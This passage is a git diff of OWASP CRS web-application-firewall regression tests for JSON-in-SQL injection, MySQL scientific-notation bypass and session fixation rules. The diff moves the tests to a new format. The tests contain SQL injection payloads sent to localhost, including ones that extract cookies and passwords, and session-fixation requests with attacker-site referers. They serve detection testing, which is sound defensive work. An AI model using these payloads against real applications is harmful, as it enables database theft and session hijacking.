text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 18 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 19 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 20 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 21 desc: | JSON in SQL (ARGS) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 22 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 23 desc: | JSON in SQL (ARGS) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 24 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 25 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":"b"}' ? 'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 26 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":"b"}' ? 'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 27 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2]' ? '1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 28 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2]' ? '1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 29 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 30 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 31 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 32 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 33 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 34 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 35 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 36 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml index 8e1cbfb..091b972 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml @@ -2,40 +2,39 @@ meta: author: "Xhoenix, azurit" description: MySQL Scientific Notation bypass payloads Detection - enabled: true - name: 942560.yaml +rule_id: 942560 tests: - - test_title: 942560-1 + - test_id: 1 desc: "Positive test for Scientific Notation in MySQL, e.g 1.e(" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" - version: HTTP/1.0 - output: - log_contains: id "942560" - - test_title: 942560-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" + version: HTTP/1.0 + output: + log: + expect_ids: [942560] + - test_id: 2 desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e(" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "foo=1.e(ascii)" - version: HTTP/1.0 - output: - log_contains: id "942560" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "foo=1.e(ascii)" + version: HTTP/1.0 + output: + log: + expect_ids: [942560] diff --git a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml index 1713247..56e504c 100644 --- a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml +++ b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml @@ -1,49 +1,47 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943100.yaml +rule_id: 943100 tests: - - test_title: 943100-1 + - test_id: 1 desc: Session Fixation Attack (943100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get/foo.php?bar=blah' - version: HTTP/1.1 - output: - log_contains: id "943100" - - test_title: 943100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get/foo.php?bar=blah' + version: HTTP/1.1 + output: + log: + expect_ids: [943100] + - test_id: 2 desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/foo.php?test=.cookie;expires=" - version: HTTP/1.1 - output: - log_contains: id "943100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/foo.php?test=.cookie;expires=" + version: HTTP/1.1 + output: + log: + expect_ids: [943100] diff --git a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml index 0802f4f..f0a0200 100644 --- a/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml +++ b/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml @@ -1,85 +1,83 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943110.yaml +rule_id: 943110 tests: - - test_title: 943110-1 + - test_id: 1 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http://www.attackersite.com/test - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943110" - - test_title: 943110-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http://www.attackersite.com/test + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + expect_ids: [943110] + - test_id: 2 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://localhost.attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://localhost.attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log: + expect_ids: [943110] + - test_id: 3 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log: + expect_ids: [943110] + - test_id: 4 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: 